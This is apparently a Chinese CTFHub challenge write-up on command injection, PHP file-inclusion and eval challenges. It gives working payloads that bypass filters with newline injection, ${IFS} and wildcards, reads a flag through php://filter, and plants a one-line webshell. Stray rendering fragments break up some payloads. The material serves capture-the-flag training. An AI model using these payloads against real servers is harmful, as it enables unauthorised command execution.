过滤运算符 
   
过滤了\和&那么尝试;     
成功那么将flag cat出来  127.0.0.1;cat flag_27249269530391.php     
得到flag  
综合过滤练习 
   
这次过滤有点多过滤了&;空格flag,cat,ctfhub  但是没有过滤%0a,%0d,用
    
     
      
       
        
         I
        
        
         F
        
        
         S
        
       
       
        取
       
       
        代
       
       
        空
       
       
        格
       
       
        ,
       
       
        用
       
      
      
       {IFS}取代空格,用
      
     
    IFS取代空格,用*绕过关键词过滤,因为在没有定义的情况下,$*在shell命令执行下为空     
回显有一个flag_is_here文件夹  payload:http://challenge-0d5b8ca008f117b9.sandbox.ctfhub.com:10800/?ip=127.0.0.1%0Acd${IFS}fl*ag_is_here%0Als#这里ls是对flag_is_here目录进行操作,所有ls 是在cd flag_is_here执行后在flag_is_here目录下执行,这里拼接的就得用%0a换行符,可以等效&&,不能用%0d,%0d等效于&。     
将flag tail出来  http://challenge-0d5b8ca008f117b9.sandbox.ctfhub.com:10800/?ip=127.0.0.1%0Acd
    
     
      
       
        
         I
        
        
         F
        
        
         S
        
       
       
        f
       
       
        l
       
       
        ?
       
       
        a
       
       
        
         g
        
        
         i
        
       
       
        
         s
        
        
         h
        
       
       
        e
       
       
        r
       
       
        e
       
      
      
       {IFS}fl*ag_is_here%0Atail
      
     
    IFSfl?agi?sh?ere{IFS}fl*ag_126912367811026.php#     
得到flag  
读取源代码 
   
进入环境源码直接给了出来分析代码尝试使用伪协议来读取  ?file=php://filter/read=convert.base64-encode/resource=/flag  将读取出来的字符串进行base64解码     
flag出现  
远程包含 
   
根据题意我们首先在服务器中创建一个文件夹然后编辑一个一句话木马     
python启动一个http服务     
然后使用蚁剑连接即可  
eval执行 
   
题目一进去就把源码给了出来     
测试了一下函数能直接运行     
将flag cat出来     
文件包含 
   
进入题目点击shell     
源代码如上     
根据题意文件包含又提供了shell,使用hackbar进行shell的使用  
   
查看根目录发现flag     
cat出来     
php://input 
   
进入题目题目将源码给了出来并且前六位必须为php://  根据题目得知需要使用php://input来解题  补充一个知识点     
抓包使用php://input漏洞     
cat flag    
                
                
                
        
    
 
 |